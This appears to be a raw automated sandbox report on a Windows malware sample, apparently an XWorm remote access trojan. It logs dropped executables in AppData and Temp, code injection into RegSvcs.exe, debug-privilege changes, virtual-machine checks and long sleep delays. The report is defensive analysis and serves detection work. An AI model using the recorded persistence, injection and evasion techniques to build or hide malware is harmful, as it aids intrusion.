Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B7BF1 push 39D0B948h; ret	0_2_00007FF8489B7BF6
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BFB09 push ecx; ret	0_2_00007FF8489BFB0A
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BF35C push ecx; ret	0_2_00007FF8489BF35D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B9B71 push ecx; ret	0_2_00007FF8489B9B72
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BBB69 push ecx; ret	0_2_00007FF8489BBB6A
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B9B3B push ecx; ret	0_2_00007FF8489B9B3C
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BFCA0 push ecx; ret	0_2_00007FF8489BFCA1
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BDCB5 push ecx; ret	0_2_00007FF8489BDCB6
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BDC85 push ecx; ret	0_2_00007FF8489BDC86
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C047A push ecx; ret	0_2_00007FF8489C047B
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BF496 push ecx; ret	0_2_00007FF8489BF497

Source: 9NBx4Vmiuj.exe	Static PE information: section name: .text entropy: 7.997404824515428
Source: TypeId.exe.0.dr	Static PE information: section name: .text entropy: 7.997404824515428

Source: Yara match	File source: 00000000.00000002.2135818855.00000234355C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9NBx4Vmiuj.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 1248, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	File created: C:\ProgramData\btjxg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\btjxg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	File created: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Jump to dropped file

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7704, type: MEMORYSTR

Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMDEBUGLOG_TYPEID.EXE_1248.TXT
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE\
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIG66
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925140000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEWINSTA0\DEFAULT/E
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILE:///C:/USERS/user/APPDATA/ROAMING/AUDITRULETYPE/TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXER
Source: TypeId.exe, 00000007.00000002.2585257546.00000021F43E1000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: !TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEWINSTA0\DEFAULT
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEWINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPSPATHEXT=.COM;.EXE;.BAT;.C
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEV
Source: TypeId.exe, 00000002.00000002.2150010179.000002183E06B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 68PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E5A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 8C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\LOCALC:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0\USAGELOGS\TYPEID.EXE.LOG
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_APPHELPDEBUG_TYPEID.EXE_1248.TXT
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEEPT]#
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2135131291.0000023435541000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE?
Source: TypeId.exe, 00000002.00000002.2148167261.000000A85ABE1000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEI
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E53E000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E542000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 8C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEP^
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C332000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE\|
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 9C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000007.00000002.2589739106.00000209253D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE$Z
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXEINE
Source: TypeId.exe, 00000007.00000002.2585257546.00000021F43E1000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: !C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEI
Source: TypeId.exe, 00000002.00000002.2162900944.0000021856A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0\USAGELOGS\TYPEID.EXE.LOG
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE{"!0N
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXEIN
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ?C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIG`_
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E53E000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E542000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2163987282.0000021856C4A000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2163184946.0000021856AC4000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148564813.000002183C332000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2149486171.000002183C580000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.0000020925140000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2589739106.00000209253D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2125823994.000002341AFA2000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2135818855.00000234355C7000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341CD1F000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2137559195.0000023435783000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150286073.000002183E0F4000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E5A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <COMMAND>C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE</COMMAND>
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 8C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE8
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: N\MICROSOFT\WINDOWS\AUDITRULETYPE\TYPEIDETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.0000020925140000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEPDATA\ROAMINGCOMMONPROGRAMFILEAMPL
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2136881834.0000023435705000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2149792202.000002183E051000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C332000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXEWQD
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TATEC:\WINDOWS\TEMP\ASLLOG_SHIMENGSTATE_TYPEID.EXE_1248.TXTPE,<
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341CCE2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E542000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148167261.000000A85ABE1000.00000004.00000010.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2529744387.000001EC90031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2775890148.0000028016A11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXE
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILE:///C:/USERS/user/APPDATA/ROAMING/AUDITRULETYPE/TYPEID.EXET5
Source: TypeId.exe, 00000007.00000002.2586408663.000002092517A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE+G
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319;C:\WINDOWS\SYSTEM32;C:\WINDOWS\SYSTEM;C:\WINDOWS;.;C:\PROGRAM FILES (X86)\COC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXENDOWS;C
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2137559195.0000023435783000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \TYPEID.EXE<
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIGAK&D
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE-<
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319;C:\WINDOWS\SYSTEM32;C:\WINDOWS\SYSTEM;C:\WINDOWS;.;C:\PROGRAM FILES (X86)\COC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXENDOWS;C-E
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @FILE:///C:/USERS/user/APPDATA/ROAMING/AUDITRULETYPE/TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIGTK
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXE2
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \S-1-5-21-2246122658-3693405117-2476756634-1003YPEID.EXE
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIG

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Memory allocated: 2341C7D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Memory allocated: 23434990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory allocated: 2183C4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory allocated: 218561C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Memory allocated: 1260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Memory allocated: 1B070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory allocated: 20925400000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory allocated: 2093ECE0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7144	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Window / User API: threadDelayed 2226	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Window / User API: threadDelayed 7625	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6150
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3646
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3228
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2841

Windows Analysis Report 9NBx4Vmiuj.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
9NBx4Vmiuj.exe

Malware Threat Intel
Provided by

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe TID: 1860	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe TID: 5680	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe TID: 8112	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe TID: 7244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836	Thread sleep time: -6456360425798339s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.3413577503.000001E3D1AD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWfigu%SystemRoot%\system32\mswsock.dllcKeyToken=b03f5f7f11d50a3a"
Source: btjxg.exe, 00000004.00000002.3366251779.000000000136E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
Source: btjxg.exe, 00000004.00000002.3388814639.000000001BDF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 140000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 140002000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 1400A0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe base: 5B53DFA010	Jump to behavior

Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: btjxg.exe, 00000004.00000002.3374102569.000000000311A000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.000000000310C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Queries volume information: C:\Users\user\Desktop\9NBx4Vmiuj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Queries volume information: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\btjxg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
